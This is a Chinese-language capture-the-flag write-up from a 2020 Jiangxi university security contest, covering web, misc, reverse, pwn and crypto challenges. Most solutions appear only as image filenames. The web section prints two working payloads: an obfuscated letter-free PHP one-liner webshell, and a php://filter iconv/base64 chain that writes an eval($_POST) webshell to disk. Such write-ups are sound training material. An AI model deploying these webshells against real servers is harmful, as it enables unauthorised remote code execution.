2020年江西省大學生資訊保安技術大賽Writeup

black_doufu發表於2020-10-27

2020年江西省大學生資訊保安技術大賽Writeup

一、WEB

0x01 web1-找色差嘛

題解1-官方

image-20201027194831403

image-20201027194929844

image-20201027194941703

image-20201027195005245

題解2-江西軟體職業技術大學

burpsuite 抓包直接改傳參,返回包裡面存有flag

0x02 web2

這道題好像是官方配置有問題,在一個容器裡面有多個漏洞環境,很容易getshell,但是找不到flag,官方最後換了題

題解1-無

0x03 web3-Easy_console

題解1-官方

image-20201027195428526

image-20201027195441990

image-20201027195501723

image-20201027195532675

image-20201027195547942

image-20201027195603641

image-20201027195619674

image-20201027195630674

題解2-江西軟體職業技術大學

這題試了挺多方法的

image-20201027195913236

慢日誌寫shell 失敗

image-20201027195737822

寫日誌getshell 失敗

image-20201027195818799

最後在檔案上傳位置上傳getshell

image-20201027195955861

無字母一句話getshell

<?php $__=[]; $_=($__==$__); $__=~(融); $___=$__[$_]; $__=~(匆); $___.=$__[$_].$__[$_]; $__=~(隨); $___.=$__[$_]; $__=~(千); $___.=$__[$_]; $__=~(苦); $___.=$__[$_]; $____=~(~(_)); $__=~(詩); $____.=$__[$_]; $__=~(塵); $____.=$__[$_]; $__=~(欣); $____.=$__[$_]; $__=~(站); $____.=$__[$_]; $_=$$____; $___($_[_]);

0x04 web4-Ezexit

題解1-官方

image-20201027200116537

題解2-江西軟體職業技術大學

https://xz.aliyun.com/t/7457

image-20201027200328026

image-20201027200353148

image-20201027200414231

image-20201027200436094

image-20201027200454766

path=php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWydjY2MnXSk7Pz4g/../h.php

二、MISC

Different_P

image-20201027202215860

image-20201027202230775

image-20201027202243021

奇怪的雜項

image-20201027201808897

image-20201027201819876

image-20201027201830138

神祕檔案

image-20201027201902750

image-20201027201916064

image-20201027201932280

image-20201027201942701

newbie_rsa

image-20201027200814665

image-20201027200826766

image-20201027200837495

image-20201027200847050

三、REVERSE

ReMe

image-20201027200953650

image-20201027201006214

image-20201027201029918

image-20201027201040805

image-20201027201052479

image-20201027201113499

findme

image-20201027200601007

image-20201027200649309

image-20201027200700219

image-20201027200710600

image-20201027200737492

四、PWN

easy_rop

image-20201027202347095

image-20201027202359212

image-20201027202411777

image-20201027202422316

image-20201027202434842

image-20201027202449418

image-20201027202503853

image-20201027202519155

image-20201027202531363

Summeron

image-20201027201257061

image-20201027201344267

image-20201027201359990

image-20201027201415075

五、CRYPTO

babyCrypto

image-20201027202042600

image-20201027202057573

image-20201027202109123

image-20201027202127409

港獨密報

image-20201027201522812

image-20201027201548760

image-20201027201601942

image-20201027201626177

image-20201027201638258

image-20201027201649553

image-20201027201659154

相關文章